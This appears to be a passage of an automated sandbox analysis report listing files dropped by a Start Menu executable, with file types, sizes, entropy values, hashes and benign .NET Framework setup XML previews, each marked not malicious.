                                                            SSDEEP:1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
                                                            MD5:F9657D290048E169FFABBBB9C7412BE0
                                                            SHA1:E45531D559C38825FBDE6F25A82A638184130754
                                                            SHA-256:B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
                                                            SHA-512:8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (409), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):93314
                                                            Entropy (8bit):3.379177079191028
                                                            Encrypted:false
                                                            SSDEEP:384:tYDmmqzP4JUaGMLiqedW0XeeUnG3GPcbrKFl:tRTaBG2PcbrIl
                                                            MD5:4A61E563A344188E3FDEB19C25197710
                                                            SHA1:BDD1E1774DB4CCE9D5393882B61F1360826C1DFA
                                                            SHA-256:7E682BDF51FAC1B3991E6E6330BBF5E7C63060053A8503DAAEA77AB5CD70888A
                                                            SHA-512:F898AC736AC8017624733BBE50C281239BB6F9472B04FB3459C428B22843637AACE99C6A4023ABBB537070F43A0A34FD900D19A4B90C001772C8A67467805801
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .E.x.t.e.n.d.e.d. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.g.M.u.t.e.x.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):39050
                                                            Entropy (8bit):3.114226586013312
                                                            Encrypted:false
                                                            SSDEEP:768:24URsd5vssgP7ZgZ/vSguJQvFQXvDINJh6Fuh3kr1UO0NWpPUb9cu+dOtOcOdOjQ:24URsd5vsTPuZXQYQLIN/6Fuh3kr1UOB
                                                            MD5:EC417B1688CA10739C0737B72BF07431
                                                            SHA1:A1CF21FD2183C1C4E308FB3C6600D5855BDB3E51
                                                            SHA-256:0452A6720E55B9D4E61225BB66016513DDE15CE9CC1FB305FC0037D008476787
                                                            SHA-512:B317C2985FCADC551F28791311966F9FDE1B854144723AFD449BE1280AB6D6D6CBE8D50FB113282C3DDB687BEC3048D7F93F2DD97AA63B596FA6C0C80A46481E
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):4.923507556620034
                                                            Encrypted:false
                                                            SSDEEP:24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
                                                            MD5:7E55DDC6D611176E697D01C90A1212CF
                                                            SHA1:E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
                                                            SHA-256:FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
                                                            SHA-512:283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5118974066097444
                                                            Encrypted:false
                                                            SSDEEP:6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
                                                            MD5:26A00597735C5F504CF8B3E7E9A7A4C1
                                                            SHA1:D913CB26128D5CA1E1AC3DAB782DE363C9B89934
                                                            SHA-256:37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
                                                            SHA-512:08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5178766234336925
                                                            Encrypted:false
                                                            SSDEEP:12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
                                                            MD5:8419CAA81F2377E09B7F2F6218E505AE
                                                            SHA1:2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
                                                            SHA-256:DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
                                                            SHA-512:74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5189797450574103
                                                            Encrypted:false
                                                            SSDEEP:12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
                                                            MD5:924FD539523541D42DAD43290E6C0DB5
                                                            SHA1:19A161531A2C9DBC443B0F41B97CBDE7375B8983
                                                            SHA-256:02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
                                                            SHA-512:86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5119705312617957
                                                            Encrypted:false
                                                            SSDEEP:6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
                                                            MD5:BB55B5086A9DA3097FB216C065D15709
                                                            SHA1:1206C708BD08231961F17DA3D604A8956ADDCCFE
                                                            SHA-256:8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
                                                            SHA-512:DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5083713071878764
                                                            Encrypted:false
                                                            SSDEEP:6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
                                                            MD5:3B4861F93B465D724C60670B64FCCFCF
                                                            SHA1:C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
                                                            SHA-256:7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
                                                            SHA-512:2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.5043420982993396
                                                            Encrypted:false
                                                            SSDEEP:12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
                                                            MD5:70006BF18A39D258012875AEFB92A3D1
                                                            SHA1:B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
                                                            SHA-256:19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
                                                            SHA-512:97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.4948009720290445
                                                            Encrypted:false
                                                            SSDEEP:6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
                                                            MD5:FB4DFEBE83F554FAF1A5CEC033A804D9
                                                            SHA1:6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
                                                            SHA-256:4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
                                                            SHA-512:3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):894
                                                            Entropy (8bit):2.513882730304912
                                                            Encrypted:false
                                                            SSDEEP:12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
                                                            MD5:D1C53003264DCE4EFFAF462C807E2D96
                                                            SHA1:92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
                                                            SHA-256:5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
                                                            SHA-512:C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):4.824239610266714
                                                            Encrypted:false
                                                            SSDEEP:24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
                                                            MD5:7D62E82D960A938C98DA02B1D5201BD5
                                                            SHA1:194E96B0440BF8631887E5E9D3CC485F8E90FBF5
                                                            SHA-256:AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
                                                            SHA-512:AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):36710
                                                            Entropy (8bit):5.3785085024370805
                                                            Encrypted:false
                                                            SSDEEP:384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
                                                            MD5:3D25D679E0FF0B8C94273DCD8B07049D
                                                            SHA1:A517FC5E96BC68A02A44093673EE7E076AD57308
                                                            SHA-256:288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
                                                            SHA-512:3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):5.038533294442847
                                                            Encrypted:false
                                                            SSDEEP:24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
                                                            MD5:661CBD315E9B23BA1CA19EDAB978F478
                                                            SHA1:605685C25D486C89F872296583E1DC2F20465A2B
                                                            SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
                                                            SHA-512:802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):1150
                                                            Entropy (8bit):5.854644771288791
                                                            Encrypted:false
                                                            SSDEEP:24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
                                                            MD5:EE2C05CC9D14C29F586D40EB90C610A9
                                                            SHA1:E571D82E81BD61B8FE4C9ECD08869A07918AC00B
                                                            SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
                                                            SHA-512:0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):10134
                                                            Entropy (8bit):6.016582854640062
                                                            Encrypted:false
                                                            SSDEEP:96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
                                                            MD5:5DFA8D3ABCF4962D9EC41CFC7C0F75E3
                                                            SHA1:4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
                                                            SHA-256:B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
                                                            SHA-512:69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                            Category:dropped
                                                            Size (bytes):10134
                                                            Entropy (8bit):4.3821301214809045
                                                            Encrypted:false
                                                            SSDEEP:192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
                                                            MD5:B2B1D79591FCA103959806A4BF27D036
                                                            SHA1:481FD13A0B58299C41B3E705CB085C533038CAF5
                                                            SHA-256:FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
                                                            SHA-512:5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (413), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):272046
                                                            Entropy (8bit):3.4004643852090877
                                                            Encrypted:false
                                                            SSDEEP:384:EYSROAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKYP4JUaGMLi:EFROYoVQTLTQTDFdhaaot6PcbrIl
                                                            MD5:7213DA83E0F0B8AE4FEA44AE1CB7F62B
                                                            SHA1:F2E3FCC77A1AD4D042253BD2E0010BCB40B68ED3
                                                            SHA-256:59E67E4FB46E5490EEE63D8B725324F1372720ADE7345C74C6138C4A76EA73D9
                                                            SHA-512:86186AB0F2CB38E520DD1284042ECED157F96874846EB9061BE9CF56B84A1CAB5901A4879E105A8B04B336BBC43B03F4BDF198D43AF868BE188602347DB829E0
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="utf-16"?> <Setup xmlns="http://schemas.microsoft.com/Setup/2008/01/im" xmlns:ironman="http://schemas.microsoft.com/Setup/2008/01/im" SetupVersion="1.0"> <UI Dll="SetupUi.dll" Name="Microsoft .NET Framework 4 Setup" Version="4.0.30319" /> <Configuration> <DisabledCommandLineSwitches> <CommandLineSwitch Name="createlayout" /> </DisabledCommandLineSwitches> <UserExperienceDataCollection Policy="OSControlled" /> <BlockingMutex Name="Ne
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):78152
                                                            Entropy (8bit):6.011592088917562
                                                            Encrypted:false
                                                            SSDEEP:1536:sYNItbBL5NWiiESc0exWZnqxMQP8ZOs0JD9rHUq:sYNAB9NWTZctc/gBJ9oq
                                                            MD5:006F8A615020A4A17F5E63801485DF46
                                                            SHA1:78C82A80EBF9C8BF0C996DD8BC26087679F77FEA
                                                            SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
                                                            SHA-512:C603ED6F3611EB7049A43A190ED223445A9F7BD5651100A825917198B50C70011E950FA968D3019439AFA0A416752517B1C181EE9445E02DA3904F4E4B73CE76
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):807256
                                                            Entropy (8bit):6.357664904941565
                                                            Encrypted:false
                                                            SSDEEP:24576:GS62nlYAqK/AitUgiuVQk/oifPNJIkjbSTzR8NmsBJj:GS62nlYAltBjPNJIkHST18QsBJ
                                                            MD5:84C1DAF5F30FF99895ECAB3A55354BCF
                                                            SHA1:7E25BA36BCC7DEED89F3C9568016DDB3156C9C5A
                                                            SHA-256:7A0D281FA802D615EA1207BD2E9EBB98F3B74F9833BBA3CB964BA7C7E0FB67FD
                                                            SHA-512:E4FB7E4D39F094463FDCDC4895AB2EA500EB51A32B6909CEC80A526BBF34D5C0EB98F47EE256C0F0865BF3169374937F047BF5C4D6762779C8CA3332B4103BE3
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):295248
                                                            Entropy (8bit):6.262127887617593
                                                            Encrypted:false
                                                            SSDEEP:3072:/LTVUK59JN+C0iy4Ww8oBcPFIOrvHvr8QDZHAAKWiIHT6llN1QkvQZaiionv5y/y:HOoMFrz8ygAKWiiIyKf73w
                                                            MD5:EB881E3DDDC84B20BD92ABCEC444455F
                                                            SHA1:E2C32B1C86D4F70E39DE65E9EBC4F361B24FF4A1
                                                            SHA-256:11565D97287C01D22AD2E46C78D8A822FA3E6524561D4C02DFC87E8D346C44E7
                                                            SHA-512:5750CEC73B36A3F19BFB055F880F3B6498A7AE589017333F6272D26F1C72C6F475A3308826268A098372BBB096B43FBD1E06E93EECC0A81046668228BC179A75
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):30120
                                                            Entropy (8bit):4.990211039591874
                                                            Encrypted:false
                                                            SSDEEP:768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
                                                            MD5:2FADD9E618EFF8175F2A6E8B95C0CACC
                                                            SHA1:9AB1710A217D15B192188B19467932D947B0A4F8
                                                            SHA-256:222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
                                                            SHA-512:A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):96088
                                                            Entropy (8bit):6.292361456158864
                                                            Encrypted:false
                                                            SSDEEP:1536:L+59IKI1N74oszIepIJqwlAno0dwRXPuY6zcVcE7OgkT9vs6M4raUZrH9rHUA:L+59hI1NktIemJllRXGYRKEaVM4raUZh
                                                            MD5:8DFBB95989AF28058C7431704CE7CD66
                                                            SHA1:78A5927D6B65D177F537FC671ED6BE4A77F20353
                                                            SHA-256:589B4F04ED38A35D29C4A16FCCB489C3FBA6505F5DA399C1A2AF0CA966486059
                                                            SHA-512:51FFB1B20006BB1C2F396C84EF19D7D47AD421D0A3196919B4ABC26405326BF15DDB989EDF815CBEDEEA8DEDC0454C0CC22A3987492E9BC1646A42A31151E1AF
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:PC bitmap, Windows 3.x format, 200 x 200 x 8, image size 40002, resolution 3779 x 3779 px/m, cbSize 41080, bits offset 1078
                                                            Category:dropped
                                                            Size (bytes):41080
                                                            Entropy (8bit):6.9955557349183595
                                                            Encrypted:false
                                                            SSDEEP:384:G1o2kgxmJGEsU3pP28+Qq1ms68/tUqHUlHGwM7bwv3ETbFrS:kkpoapTbimsqHGI
                                                            MD5:0966FCD5A4AB0DDF71F46C01EFF3CDD5
                                                            SHA1:8F4554F079EDAD23BCD1096E6501A61CF1F8EC34
                                                            SHA-256:31C13ECFC0EB27F34036FB65CC0E735CD444EEC75376EEA2642F926AC162DCB3
                                                            SHA-512:A9E70A2FB5A9899ACF086474D71D0E180E2234C40E68BCADB9BF4FE145774680CB55584B39FE53CC75DE445C6BF5741FC9B15B18385CBBE20FC595FE0FF86FCE
                                                            Malicious:false
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):14084
                                                            Entropy (8bit):3.701412990655975
                                                            Encrypted:false
                                                            SSDEEP:384:VqZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VqB
                                                            MD5:8A28B474F4849BEE7354BA4C74087CEA
                                                            SHA1:C17514DFC33DD14F57FF8660EB7B75AF9B2B37B0
                                                            SHA-256:2A7A44FB25476886617A1EC294A20A37552FD0824907F5284FADE3E496ED609B
                                                            SHA-512:A7927700D8050623BC5C761B215A97534C2C260FCAB68469B7A61C85E2DFF22ED9CF57E7CB5A6C8886422ABE7AC89B5C71E569741DB74DAA2DCB4152F14C2369
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="utf-16"?>..<SetupUI xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui" ..         xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui" >..  <Strings>..    <!-- Reflective property page -->..    <IDS_IS_REALLY_CANCEL>#(loc.ids_is_really_cancel)</IDS_IS_REALLY_CANCEL>....    <!-- System Requirements page -->..    <SYSREQPAGE_REQUIRED_AND_AVAILABLE_DISK_SPACE>#(loc.sysreqpage_required_and_available_disk_space)</SYSREQPAGE_REQUIRED_AND_AVAILABLE_DISK_S
                                                            Process:C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):38898
                                                            Entropy (8bit):3.1042370213993578
                                                            Encrypted:false
                                                            SSDEEP:768:24UR0d5vssgP7ZgZ/vSguJQvFQXvDINJh6Fmhvk71sO0Nep3UL9Eu+dOtOcOdOjY:24UR0d5vsTPuZXQYQLIN/6Fmhvk71sOR
                                                            MD5:8B8B0A935DC591799A0C6D52FDC33460
                                                            SHA1:CE2748BD469AAD6E90B06D98531084D00611FB89
                                                            SHA-256:57A9CCB84CAE42E0D8D1A29CFE170AC3F27BDCAE829D979CDDFD5E757519B159
